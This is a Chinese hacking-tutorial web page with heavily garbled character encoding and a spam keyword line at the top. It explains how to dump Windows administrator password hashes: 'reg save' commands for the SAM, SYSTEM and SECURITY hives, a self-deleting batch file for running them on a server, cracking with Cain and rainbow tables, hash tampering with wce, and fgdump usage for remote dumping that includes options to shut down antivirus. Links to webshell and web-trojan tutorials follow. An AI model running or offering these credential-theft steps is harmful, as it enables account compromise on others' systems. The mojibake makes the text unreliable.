欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

抓取管理員hash值(哈希)的另類(lèi)方法

  發(fā)布時(shí)間:2012-05-11 10:44:12   作者:佚名   我要評(píng)論
哈希算法將任意長(zhǎng)度的二進(jìn)制值映射為固定長(zhǎng)度的較小二進(jìn)制值,這個(gè)小的二進(jìn)制值稱(chēng)為哈希值。哈希值是一段數(shù)據(jù)唯一且極其緊湊的數(shù)值表示形式。如果散列一段明文而且哪怕只更改該段落的一個(gè)字母,隨后的哈希都將產(chǎn)生不同的值。要找到散列為同一個(gè)值的兩個(gè)不同的輸入,在計(jì)
今天抓hash的時(shí)候發(fā)現(xiàn)GetHashes.exe不好使..另外又測(cè)試了幾個(gè)也都不好用...
不同版本的Windows的hash獲取方法不一樣.
用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack.
 于是百度了一些資料穿上來(lái)!希望大家能學(xué)習(xí)一下。
 ====================================第1種===========================================
 使用工具 cain、cmd、wce1.2等
 首先使用通用方法抓取HASH
 使用命令先保存一份需要的信息。
 reg save hklm\sam sam.hive
 reg save hklm\system system.hive
 reg save hklm\security security.hive
 (這三個(gè)文件我找了個(gè)批處理,這樣比較方便)
 ==========================
 @echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
 ===========================
 保存為批處理文件,直接在服務(wù)器上運(yùn)行。
 就會(huì)在批處理所在目錄生成這三個(gè)文件
 和下面的效果一樣,只不過(guò)簡(jiǎn)化了步驟
\
然后我們使用CAIN打開(kāi)保存到的system.hive 和security.hive兩個(gè)文件。我是在虛擬機(jī)里面操作就直接在虛擬機(jī)里面搞了。。大家在服務(wù)器上搞可以下載到本地。
 打開(kāi)CAIN選擇LSA Secrets然后打開(kāi)system.hive 和security.hive兩個(gè)文件
\
加載后我們可以看到一些信息,這些信息可能會(huì)有明文密碼,我這里是沒(méi)有的。
\
如果沒(méi)有我們就需要抓HASH了。點(diǎn)擊CAIN的Cracker選項(xiàng)卡,加載sam.hive文件。
\
\
拿到HASH了,www.dbjr.com.cn 下面就是破解,用工具自帶的破解試試密碼出來(lái)了,我設(shè)置的123456
\
我們也可以使用彩虹表來(lái)破解
下面我們使用wce來(lái)搞。。這個(gè)工具是滲透利器哈~~具體介紹大家自己百度去。
\
從幫助來(lái)看我們可以使用-l參數(shù)查看NTML hash
 我們還可以用-s參數(shù)來(lái)改HASH值如圖
\
從圖中我們可以看到最后一位的HASH我從4修改到了5
\
====================================第2種===========================================
fgdump 可以遠(yuǎn)程抓Hash的工具
 作者:TheLostMind
一直都是本地抓,今天上SamInside論壇看到一個(gè)開(kāi)源的工具,fgdump,可以遠(yuǎn)程抓。
 http://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm
 fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.
Usage:
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]
where Username and Password have administrator credentials
-? displays help (you're looking at it!)
-t will test for the presence of antivirus without actually running the password dumps
-c skips the cache dump
-w skips the password dump
-s performs the protected storage dump
-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
-v makes output more verbose. Use twice for greater effect
-k keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l logs all output to logfile
-T runs fgdump with the specified number of parallel threads
-h is the name of the single host to perform the dumps against
-f reads hosts from a line-separated file
-H reads host:username:password from a line-separated file (per-host credentials)
-o skips pwdump history dumps
-a will not attempt to detect or shut down antivirus, even if it is present
 -O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified.
** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)
測(cè)試了一下,很不錯(cuò),簡(jiǎn)單翻譯了一下幫助。
 用法:
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u
 Username -p Password | -H filename}]
 用戶(hù)名和密碼要求要有管理員資格
 -? 顯示幫助
-t 測(cè)試當(dāng)前的殺毒軟件,并不是真正的轉(zhuǎn)儲(chǔ)密碼
-c 跳過(guò)緩存轉(zhuǎn)儲(chǔ)
-w 跳過(guò)密碼轉(zhuǎn)儲(chǔ)
-s 執(zhí)行保護(hù)存貯轉(zhuǎn)儲(chǔ)
-r 忽略現(xiàn)存的pwdump/cachedump文件。默認(rèn)的行為是跳過(guò)存在這些文件的主機(jī)。
-v 詳細(xì)輸出. 使用兩次能獲得更為詳細(xì)的輸出
-k 即使不知道殺毒軟件的狀態(tài)也繼續(xù)執(zhí)行pwdump/cachedump(進(jìn)行密碼轉(zhuǎn)儲(chǔ))
-l 記錄所有輸出到日志文件
-T 使用指定數(shù)量的線(xiàn)程執(zhí)行此程序
-h 需要執(zhí)行密碼轉(zhuǎn)儲(chǔ)的單個(gè)目標(biāo)主機(jī)
-f 從用行分隔的文件中讀取主機(jī)列表
-H 從用行分隔的文件中讀取 主機(jī)名:用戶(hù)名:密碼
-o 跳過(guò)轉(zhuǎn)儲(chǔ)歷史密碼
-a 試圖檢測(cè)或關(guān)閉殺毒軟件,即使殺毒軟件正在運(yùn)行
 -O 手工設(shè)置遠(yuǎn)程主機(jī)是32位操作系統(tǒng)還是64位操作系統(tǒng)。 注意:這項(xiàng)操作應(yīng)用到所有指定的主機(jī)。
 ** 使用1.4.0,你可以直接運(yùn)行此程序,不需要帶參數(shù),來(lái)轉(zhuǎn)儲(chǔ)本機(jī)密碼

相關(guān)文章

  • qq號(hào)被盜了怎么辦 如何找回被盜的QQ號(hào)碼

    這篇文章主要為大家分享一下當(dāng)qq被盜時(shí)的找回密碼的方法需要的朋友可以參考一下,盡量到官方網(wǎng)站操作
    2015-05-12
  • 網(wǎng)頁(yè)掛馬詳細(xì)步驟教程

    其實(shí)很簡(jiǎn)單的的,說(shuō)到原理,就一個(gè):就是在人家網(wǎng)站的主頁(yè)那里插入一個(gè)自己的網(wǎng)馬的頁(yè)面,等有漏洞的人查看了人家網(wǎng)站的主頁(yè),那么他就成了你的肉雞了。 下面我介紹5種方
    2009-04-30
  • 黑客域名劫持攻擊的基本步驟

    近期發(fā)現(xiàn)adobe.com,internet.com,nike.com,等等著名站點(diǎn)都分分遭受到攻擊,但攻擊者所使用的技術(shù)并不是以往所使用的入侵WEB服務(wù)器,更改主頁(yè)的慣用手法,攻擊者使用的是一
    2008-10-08
  • 如何判斷電腦是否淪為“肉雞”?

    今天有網(wǎng)友問(wèn)小編怎樣判斷電腦是否淪為“肉雞”,小編就來(lái)給大家盤(pán)點(diǎn)幾條電腦淪為肉雞的表現(xiàn)
    2014-08-14
  • Google 黑客搜索技巧

    站內(nèi)搜索地址為: httpwww.google.comcustomdomains=(這里寫(xiě)我們要搜索的站點(diǎn),比如feelids.com) 進(jìn)去可以選擇www和feelids.com, 當(dāng)然再選我們要的站內(nèi)搜索
    2008-10-08
  • 偽黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介紹(圖)

    黑客必須要有專(zhuān)業(yè)的知識(shí),豐富的經(jīng)驗(yàn)。而偽黑客不需要,只需要幾個(gè)工具,掃描默認(rèn)口令、弱口令、漏洞,就能利用。
    2012-05-18
  • 教你拿站和找關(guān)鍵詞思路(圖)

    目標(biāo)這個(gè)站 http://www.chinaweibo.cc/upfile_Other.asp 這個(gè)漏洞我剛看了看成功率10%左右吧 我覺(jué)得這個(gè)數(shù)字就不低了 畢竟是批量拿webshell~~~ 關(guān)于上傳漏洞的帖子和
    2008-10-08
  • 黑客攻擊數(shù)據(jù)庫(kù)的六大手段

    普通的黑客從進(jìn)入到退出一次數(shù)據(jù)攻擊只需用不到10秒鐘時(shí)間就可完成,這個(gè)時(shí)間對(duì)于數(shù)據(jù)庫(kù)管理員來(lái)說(shuō)即使注意到入侵者都幾乎不夠。因此,在數(shù)據(jù)被損害很長(zhǎng)時(shí)間之前,許多數(shù)據(jù)
    2008-10-08
  • 蹭網(wǎng)占了點(diǎn)小便宜?黑客能讓你虧大發(fā)

    現(xiàn)在我們的生活離不開(kāi)網(wǎng)絡(luò),走到哪里都有網(wǎng)絡(luò)的存在,就算是公共場(chǎng)合,也會(huì)有免費(fèi)的WiFi,那么這些網(wǎng)絡(luò)是否安全呢?下面下面就為你解答,一起來(lái)看看吧
    2016-10-14

最新評(píng)論